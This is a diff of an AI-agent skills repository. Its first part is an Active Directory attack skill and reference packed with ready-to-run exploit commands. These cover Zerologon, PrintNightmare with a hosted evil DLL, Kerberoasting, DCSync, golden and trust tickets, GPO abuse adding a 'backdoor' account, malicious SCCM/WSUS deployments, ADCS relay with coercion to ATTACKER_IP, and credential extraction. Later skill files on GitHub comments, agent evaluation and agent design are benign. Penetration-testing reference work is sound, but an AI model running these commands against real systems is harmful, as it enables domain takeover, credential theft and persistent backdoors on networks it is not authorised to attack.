crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
|
||||
|
||||
# Exploit
|
||||
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
|
||||
|
||||
# Extract hashes
|
||||
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
|
||||
|
||||
# Restore password (important!)
|
||||
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
|
||||
```
|
||||
|
||||
### PrintNightmare (CVE-2021-1675)
|
||||
|
||||
```bash
|
||||
# Check for vulnerability
|
||||
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
|
||||
|
||||
# Exploit (requires hosting malicious DLL)
|
||||
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
|
||||
```
|
||||
|
||||
### samAccountName Spoofing (CVE-2021-42278/42287)
|
||||
|
||||
```bash
|
||||
# Automated exploitation
|
||||
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Attack | Tool | Command |
|
||||
|--------|------|---------|
|
||||
| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
|
||||
| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
|
||||
| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
|
||||
| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
|
||||
| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
|
||||
| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
|
||||
|
||||
---
|
||||
|
||||
## Constraints
|
||||
|
||||
**Must:**
|
||||
- Synchronize time with DC before Kerberos attacks
|
||||
- Have valid domain credentials for most attacks
|
||||
- Document all compromised accounts
|
||||
|
||||
**Must Not:**
|
||||
- Lock out accounts with excessive password spraying
|
||||
- Modify production AD objects without approval
|
||||
- Leave Golden Tickets without documentation
|
||||
|
||||
**Should:**
|
||||
- Run BloodHound for attack path discovery
|
||||
- Check for SMB signing before relay attacks
|
||||
- Verify patch levels for CVE exploitation
|
||||
|
||||
---
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Domain Compromise via Kerberoasting
|
||||
|
||||
```bash
|
||||
# 1. Find service accounts with SPNs
|
||||
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
|
||||
|
||||
# 2. Request TGS tickets
|
||||
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
|
||||
|
||||
# 3. Crack tickets
|
||||
hashcat -m 13100 tgs.txt rockyou.txt
|
||||
|
||||
# 4. Use cracked service account
|
||||
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
|
||||
```
|
||||
|
||||
### Example 2: NTLM Relay to LDAP
|
||||
|
||||
```bash
|
||||
# 1. Start relay targeting LDAP
|
||||
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
|
||||
|
||||
# 2. Trigger authentication (e.g., via PrinterBug)
|
||||
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
|
||||
|
||||
# 3. Use created machine account for RBCD attack
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| Clock skew too great | Sync time with DC or use faketime |
|
||||
| Kerberoasting returns empty | No service accounts with SPNs |
|
||||
| DCSync access denied | Need Replicating Directory Changes rights |
|
||||
| NTLM relay fails | Check SMB signing, try LDAP target |
|
||||
| BloodHound empty | Verify collector ran with correct creds |
|
||||
|
||||
---
|
||||
|
||||
## Additional Resources
|
||||
|
||||
For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
|
||||
382
skills/active-directory-attacks/references/advanced-attacks.md
Normal file
382
skills/active-directory-attacks/references/advanced-attacks.md
Normal file
@@ -0,0 +1,382 @@
|
||||
# Advanced Active Directory Attacks Reference
|
||||
|
||||
## Table of Contents
|
||||
1. [Delegation Attacks](#delegation-attacks)
|
||||
2. [Group Policy Object Abuse](#group-policy-object-abuse)
|
||||
3. [RODC Attacks](#rodc-attacks)
|
||||
4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
|
||||
5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
|
||||
6. [Trust Relationship Attacks](#trust-relationship-attacks)
|
||||
7. [ADFS Golden SAML](#adfs-golden-saml)
|
||||
8. [Credential Sources](#credential-sources)
|
||||
9. [Linux AD Integration](#linux-ad-integration)
|
||||
|
||||
---
|
||||
|
||||
## Delegation Attacks
|
||||
|
||||
### Unconstrained Delegation
|
||||
|
||||
When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
|
||||
|
||||
**Find Delegation:**
|
||||
```powershell
|
||||
# PowerShell
|
||||
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
|
||||
|
||||
# BloodHound
|
||||
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
|
||||
```
|
||||
|
||||
**SpoolService Abuse:**
|
||||
```bash
|
||||
# Check spooler service
|
||||
ls \\dc01\pipe\spoolss
|
||||
|
||||
# Trigger with SpoolSample
|
||||
.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
|
||||
|
||||
# Or with printerbug.py
|
||||
python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
|
||||
```
|
||||
|
||||
**Monitor with Rubeus:**
|
||||
```powershell
|
||||
Rubeus.exe monitor /interval:1
|
||||
```
|
||||
|
||||
### Constrained Delegation
|
||||
|
||||
**Identify:**
|
||||
```powershell
|
||||
Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
|
||||
```
|
||||
|
||||
**Exploit with Rubeus:**
|
||||
```powershell
|
||||
# S4U2 attack
|
||||
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
|
||||
```
|
||||
|
||||
**Exploit with Impacket:**
|
||||
```bash
|
||||
getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
|
||||
```
|
||||
|
||||
### Resource-Based Constrained Delegation (RBCD)
|
||||
|
||||
```powershell
|
||||
# Create machine account
|
||||
New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
|
||||
|
||||
# Set delegation
|
||||
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
|
||||
|
||||
# Get ticket
|
||||
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Group Policy Object Abuse
|
||||
|
||||
### Find Vulnerable GPOs
|
||||
|
||||
```powershell
|
||||
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
|
||||
```
|
||||
|
||||
### Abuse with SharpGPOAbuse
|
||||
|
||||
```powershell
|
||||
# Add local admin
|
||||
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
|
||||
|
||||
# Add user rights
|
||||
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
|
||||
|
||||
# Add immediate task
|
||||
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
|
||||
```
|
||||
|
||||
### Abuse with pyGPOAbuse (Linux)
|
||||
|
||||
```bash
|
||||
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## RODC Attacks
|
||||
|
||||
### RODC Golden Ticket
|
||||
|
||||
RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
|
||||
|
||||
### RODC Key List Attack
|
||||
|
||||
**Requirements:**
|
||||
- krbtgt credentials of the RODC (-rodcKey)
|
||||
- ID of the krbtgt account of the RODC (-rodcNo)
|
||||
|
||||
```bash
|
||||
# Impacket keylistattack
|
||||
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
|
||||
|
||||
# Using secretsdump with keylist
|
||||
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
|
||||
```
|
||||
|
||||
**Using Rubeus:**
|
||||
```powershell
|
||||
Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## SCCM/WSUS Deployment
|
||||
|
||||
### SCCM Attack with MalSCCM
|
||||
|
||||
```bash
|
||||
# Locate SCCM server
|
||||
MalSCCM.exe locate
|
||||
|
||||
# Enumerate targets
|
||||
MalSCCM.exe inspect /all
|
||||
MalSCCM.exe inspect /computers
|
||||
|
||||
# Create target group
|
||||
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
|
||||
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
|
||||
|
||||
# Create malicious app
|
||||
MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
|
||||
|
||||
# Deploy
|
||||
MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
|
||||
|
||||
# Force checkin
|
||||
MalSCCM.exe checkin /groupname:TargetGroup
|
||||
|
||||
# Cleanup
|
||||
MalSCCM.exe app /cleanup /name:backdoor
|
||||
MalSCCM.exe group /delete /groupname:TargetGroup
|
||||
```
|
||||
|
||||
### SCCM Network Access Accounts
|
||||
|
||||
```powershell
|
||||
# Find SCCM blob
|
||||
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
|
||||
|
||||
# Decrypt with SharpSCCM
|
||||
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
|
||||
```
|
||||
|
||||
### WSUS Deployment Attack
|
||||
|
||||
```bash
|
||||
# Using SharpWSUS
|
||||
SharpWSUS.exe locate
|
||||
SharpWSUS.exe inspect
|
||||
|
||||
# Create malicious update
|
||||
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
|
||||
|
||||
# Deploy to target
|
||||
SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
|
||||
|
||||
# Check status
|
||||
SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
|
||||
|
||||
# Cleanup
|
||||
SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## AD Certificate Services (ADCS)
|
||||
|
||||
### ESC1 - Misconfigured Templates
|
||||
|
||||
Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
|
||||
|
||||
```bash
|
||||
# Find vulnerable templates
|
||||
certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
|
||||
|
||||
# Request certificate as admin
|
||||
certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
|
||||
|
||||
# Authenticate
|
||||
certipy auth -pfx administrator.pfx -dc-ip DC_IP
|
||||
```
|
||||
|
||||
### ESC4 - ACL Vulnerabilities
|
||||
|
||||
```python
|
||||
# Check for WriteProperty
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
|
||||
|
||||
# Add ENROLLEE_SUPPLIES_SUBJECT flag
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
|
||||
|
||||
# Perform ESC1, then restore
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
|
||||
```
|
||||
|
||||
### ESC8 - NTLM Relay to Web Enrollment
|
||||
|
||||
```bash
|
||||
# Start relay
|
||||
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||
|
||||
# Coerce authentication
|
||||
python3 petitpotam.py ATTACKER_IP DC_IP
|
||||
|
||||
# Use certificate
|
||||
Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
|
||||
```
|
||||
|
||||
### Shadow Credentials
|
||||
|
||||
```bash
|
||||
# Add Key Credential (pyWhisker)
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
|
||||
|
||||
# Get TGT with PKINIT
|
||||
python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
|
||||
|
||||
# Get NT hash
|
||||
export KRB5CCNAME=target.ccache
|
||||
python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Trust Relationship Attacks
|
||||
|
||||
### Child to Parent Domain (SID History)
|
||||
|
||||
```powershell
|
||||
# Get Enterprise Admins SID from parent
|
||||
$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
|
||||
|
||||
# Create Golden Ticket with SID History
|
||||
kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
|
||||
```
|
||||
|
||||
### Forest to Forest (Trust Ticket)
|
||||
|
||||
```bash
|
||||
# Dump trust key
|
||||
lsadump::trust /patch
|
||||
|
||||
# Forge inter-realm TGT
|
||||
kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
|
||||
|
||||
# Use trust ticket
|
||||
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## ADFS Golden SAML
|
||||
|
||||
**Requirements:**
|
||||
- ADFS service account access
|
||||
- Token signing certificate (PFX + decryption password)
|
||||
|
||||
```bash
|
||||
# Dump with ADFSDump
|
||||
.\ADFSDump.exe
|
||||
|
||||
# Forge SAML token
|
||||
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Sources
|
||||
|
||||
### LAPS Password
|
||||
|
||||
```powershell
|
||||
# PowerShell
|
||||
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec ldap DC_IP -u user -p password -M laps
|
||||
```
|
||||
|
||||
### GMSA Password
|
||||
|
||||
```powershell
|
||||
# PowerShell + DSInternals
|
||||
$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
|
||||
$mp = $gmsa.'msDS-ManagedPassword'
|
||||
ConvertFrom-ADManagedPasswordBlob $mp
|
||||
```
|
||||
|
||||
```bash
|
||||
# Linux with bloodyAD
|
||||
python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
|
||||
```
|
||||
|
||||
### Group Policy Preferences (GPP)
|
||||
|
||||
```bash
|
||||
# Find in SYSVOL
|
||||
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
|
||||
|
||||
# Decrypt
|
||||
python3 Get-GPPPassword.py -no-pass 'DC_IP'
|
||||
```
|
||||
|
||||
### DSRM Credentials
|
||||
|
||||
```powershell
|
||||
# Dump DSRM hash
|
||||
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
|
||||
|
||||
# Enable DSRM admin logon
|
||||
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Linux AD Integration
|
||||
|
||||
### CCACHE Ticket Reuse
|
||||
|
||||
```bash
|
||||
# Find tickets
|
||||
ls /tmp/ | grep krb5cc
|
||||
|
||||
# Use ticket
|
||||
export KRB5CCNAME=/tmp/krb5cc_1000
|
||||
```
|
||||
|
||||
### Extract from Keytab
|
||||
|
||||
```bash
|
||||
# List keys
|
||||
klist -k /etc/krb5.keytab
|
||||
|
||||
# Extract with KeyTabExtract
|
||||
python3 keytabextract.py /etc/krb5.keytab
|
||||
```
|
||||
|
||||
### Extract from SSSD
|
||||
|
||||
```bash
|
||||
# Database location
|
||||
/var/lib/sss/secrets/secrets.ldb
|
||||
|
||||
# Key location
|
||||
/var/lib/sss/secrets/.secrets.mkey
|
||||
|
||||
# Extract
|
||||
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
|
||||
```
|
||||
55
skills/address-github-comments/SKILL.md
Normal file
55
skills/address-github-comments/SKILL.md
Normal file
@@ -0,0 +1,55 @@
|
||||
---
|
||||
name: address-github-comments
|
||||
description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
|
||||
---
|
||||
|
||||
# Address GitHub Comments
|
||||
|
||||
## Overview
|
||||
|
||||
Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Ensure `gh` is authenticated.
|
||||
|
||||
```bash
|
||||
gh auth status
|
||||
```
|
||||
|
||||
If not logged in, run `gh auth login`.
|
||||
|
||||
## Workflow
|
||||
|
||||
### 1. Inspect Comments
|
||||
|
||||
Fetch the comments for the current branch's PR.
|
||||
|
||||
```bash
|
||||
gh pr view --comments
|
||||
```
|
||||
|
||||
Or use a custom script if available to list threads.
|
||||
|
||||
### 2. Categorize and Plan
|
||||
|
||||
- List the comments and review threads.
|
||||
- Propose a fix for each.
|
||||
- **Wait for user confirmation** on which comments to address first if there are many.
|
||||
|
||||
### 3. Apply Fixes
|
||||
|
||||
Apply the code changes for the selected comments.
|
||||
|
||||
### 4. Respond to Comments
|
||||
|
||||
Once fixed, respond to the threads as resolved.
|
||||
|
||||
```bash
|
||||
gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
|
||||
```
|
||||
|
||||
## Common Mistakes
|
||||
|
||||
- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
|
||||
- **Not verifying auth**: Check `gh auth status` before starting.
|
||||
64
skills/agent-evaluation/SKILL.md
Normal file
64
skills/agent-evaluation/SKILL.md
Normal file
@@ -0,0 +1,64 @@
|
||||
---
|
||||
name: agent-evaluation
|
||||
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Agent Evaluation
|
||||
|
||||
You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
|
||||
production. You've learned that evaluating LLM agents is fundamentally different from
|
||||
testing traditional software—the same input can produce different outputs, and "correct"
|
||||
often has no single answer.
|
||||
|
||||
You've built evaluation frameworks that catch issues before production: behavioral regression
|
||||
tests, capability assessments, and reliability metrics. You understand that the goal isn't
|
||||
100% test pass rate—it
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-testing
|
||||
- benchmark-design
|
||||
- capability-assessment
|
||||
- reliability-metrics
|
||||
- regression-testing
|
||||
|
||||
## Requirements
|
||||
|
||||
- testing-fundamentals
|
||||
- llm-fundamentals
|
||||
|
||||
## Patterns
|
||||
|
||||
### Statistical Test Evaluation
|
||||
|
||||
Run tests multiple times and analyze result distributions
|
||||
|
||||
### Behavioral Contract Testing
|
||||
|
||||
Define and test agent behavioral invariants
|
||||
|
||||
### Adversarial Testing
|
||||
|
||||
Actively try to break agent behavior
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Single-Run Testing
|
||||
|
||||
### ❌ Only Happy Path Tests
|
||||
|
||||
### ❌ Output String Matching
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Agent scores well on benchmarks but fails in production | high | // Bridge benchmark and production evaluation |
|
||||
| Same test passes sometimes, fails other times | high | // Handle flaky tests in LLM agent evaluation |
|
||||
| Agent optimized for metric, not actual task | medium | // Multi-dimensional evaluation to prevent gaming |
|
||||
| Test data accidentally used in training or prompts | critical | // Prevent data leakage in agent evaluation |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`
|
||||
40
skills/agent-manager-skill/SKILL.md
Normal file
40
skills/agent-manager-skill/SKILL.md
Normal file
@@ -0,0 +1,40 @@
|
||||
---
|
||||
name: agent-manager-skill
|
||||
description: Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.
|
||||
---
|
||||
|
||||
# Agent Manager Skill
|
||||
|
||||
## When to use
|
||||
|
||||
Use this skill when you need to:
|
||||
|
||||
- run multiple local CLI agents in parallel (separate tmux sessions)
|
||||
- start/stop agents and tail their logs
|
||||
- assign tasks to agents and monitor output
|
||||
- schedule recurring agent work (cron)
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Install `agent-manager-skill` in your workspace:
|
||||
|
||||
```bash
|
||||
git clone https://github.com/fractalmind-ai/agent-manager-skill.git
|
||||
```
|
||||
|
||||
## Common commands
|
||||
|
||||
```bash
|
||||
python3 agent-manager/scripts/main.py doctor
|
||||
python3 agent-manager/scripts/main.py list
|
||||
python3 agent-manager/scripts/main.py start EMP_0001
|
||||
python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
|
||||
python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
|
||||
Follow teams/fractalmind-ai-maintenance.md Workflow
|
||||
EOF
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
- Requires `tmux` and `python3`.
|
||||
- Agents are configured under an `agents/` directory (see the repo for examples).
|
||||
67
skills/agent-memory-systems/SKILL.md
Normal file
67
skills/agent-memory-systems/SKILL.md
Normal file
@@ -0,0 +1,67 @@
|
||||
---
|
||||
name: agent-memory-systems
|
||||
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them. Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets. The field is fragm"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Agent Memory Systems
|
||||
|
||||
You are a cognitive architect who understands that memory makes agents intelligent.
|
||||
You've built memory systems for agents handling millions of interactions. You know
|
||||
that the hard part isn't storing - it's retrieving the right memory at the right time.
|
||||
|
||||
Your core insight: Memory failures look like intelligence failures. When an agent
|
||||
"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
|
||||
not a storage problem. You obsess over chunking strategies, embedding quality,
|
||||
and
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-memory
|
||||
- long-term-memory
|
||||
- short-term-memory
|
||||
- working-memory
|
||||
- episodic-memory
|
||||
- semantic-memory
|
||||
- procedural-memory
|
||||
- memory-retrieval
|
||||
- memory-formation
|
||||
- memory-decay
|
||||
|
||||
## Patterns
|
||||
|
||||
### Memory Type Architecture
|
||||
|
||||
Choosing the right memory type for different information
|
||||
|
||||
### Vector Store Selection Pattern
|
||||
|
||||
Choosing the right vector database for your use case
|
||||
|
||||
### Chunking Strategy Pattern
|
||||
|
||||
Breaking documents into retrievable chunks
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Store Everything Forever
|
||||
|
||||
### ❌ Chunk Without Testing Retrieval
|
||||
|
||||
### ❌ Single Memory Type for All Data
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Contextual Chunking (Anthropic's approach) |
|
||||
| Issue | high | ## Test different sizes |
|
||||
| Issue | high | ## Always filter by metadata first |
|
||||
| Issue | high | ## Add temporal scoring |
|
||||
| Issue | medium | ## Detect conflicts on storage |
|
||||
| Issue | medium | ## Budget tokens for different memory types |
|
||||
| Issue | medium | ## Track embedding model in metadata |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`
|
||||
53
skills/agent-tool-builder/SKILL.md
Normal file
53
skills/agent-tool-builder/SKILL.md
Normal file
@@ -0,0 +1,53 @@
|
||||
---
|
||||
name: agent-tool-builder
|
||||
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary. This skill covers tool design from schema to error handling. JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools. Key insight: Tool descriptions are more important than tool implementa"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Agent Tool Builder
|
||||
|
||||
You are an expert in the interface between LLMs and the outside world.
|
||||
You've seen tools that work beautifully and tools that cause agents to
|
||||
hallucinate, loop, or fail silently. The difference is almost always
|
||||
in the design, not the implementation.
|
||||
|
||||
Your core insight: The LLM never sees your code. It only sees the schema
|
||||
and description. A perfectly implemented tool with a vague description
|
||||
will fail. A simple tool with crystal-clear documentation will succeed.
|
||||
|
||||
You push for explicit error hand
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-tools
|
||||
- function-calling
|
||||
- tool-schema-design
|
||||
- mcp-tools
|
||||
- tool-validation
|
||||
- tool-error-handling
|
||||
|
||||
## Patterns
|
||||
|
||||
### Tool Schema Design
|
||||
|
||||
Creating clear, unambiguous JSON Schema for tools
|
||||
|
||||
### Tool with Input Examples
|
||||
|
||||
Using examples to guide LLM tool usage
|
||||
|
||||
### Tool Error Handling
|
||||
|
||||
Returning errors that help the LLM recover
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Vague Descriptions
|
||||
|
||||
### ❌ Silent Failures
|
||||
|
||||
### ❌ Too Many Tools
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`
|
||||
90
skills/ai-agents-architect/SKILL.md
Normal file
90
skills/ai-agents-architect/SKILL.md
Normal file
@@ -0,0 +1,90 @@
|
||||
---
|
||||
name: ai-agents-architect
|
||||
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AI Agents Architect
|
||||
|
||||
**Role**: AI Agent Systems Architect
|
||||
|
||||
I build AI systems that can act autonomously while remaining controllable.
|
||||
I understand that agents fail in unexpected ways - I design for graceful
|
||||
degradation and clear failure modes. I balance autonomy with oversight,
|
||||
knowing when an agent should ask for help vs proceed independently.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Agent architecture design
|
||||
- Tool and function calling
|
||||
- Agent memory systems
|
||||
- Planning and reasoning strategies
|
||||
- Multi-agent orchestration
|
||||
- Agent evaluation and debugging
|
||||
|
||||
## Requirements
|
||||
|
||||
- LLM API usage
|
||||
- Understanding of function calling
|
||||
- Basic prompt engineering
|
||||
|
||||
## Patterns
|
||||
|
||||
### ReAct Loop
|
||||
|
||||
Reason-Act-Observe cycle for step-by-step execution
|
||||
|
||||
```javascript
|
||||
- Thought: reason about what to do next
|
||||
- Action: select and invoke a tool
|
||||
- Observation: process tool result
|
||||
- Repeat until task complete or stuck
|
||||
- Include max iteration limits
|
||||
```
|
||||
|
||||
### Plan-and-Execute
|
||||
|
||||
Plan first, then execute steps
|
||||
|
||||
```javascript
|
||||
- Planning phase: decompose task into steps
|
||||
- Execution phase: execute each step
|
||||
- Replanning: adjust plan based on results
|
||||
- Separate planner and executor models possible
|
||||
```
|
||||
|
||||
### Tool Registry
|
||||
|
||||
Dynamic tool discovery and management
|
||||
|
||||
```javascript
|
||||
- Register tools with schema and examples
|
||||
- Tool selector picks relevant tools for task
|
||||
- Lazy loading for expensive tools
|
||||
- Usage tracking for optimization
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Unlimited Autonomy
|
||||
|
||||
### ❌ Tool Overload
|
||||
|
||||
### ❌ Memory Hoarding
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Agent loops without iteration limits | critical | Always set limits: |
|
||||
| Vague or incomplete tool descriptions | high | Write complete tool specs: |
|
||||
| Tool errors not surfaced to agent | high | Explicit error handling: |
|
||||
| Storing everything in agent memory | medium | Selective memory: |
|
||||
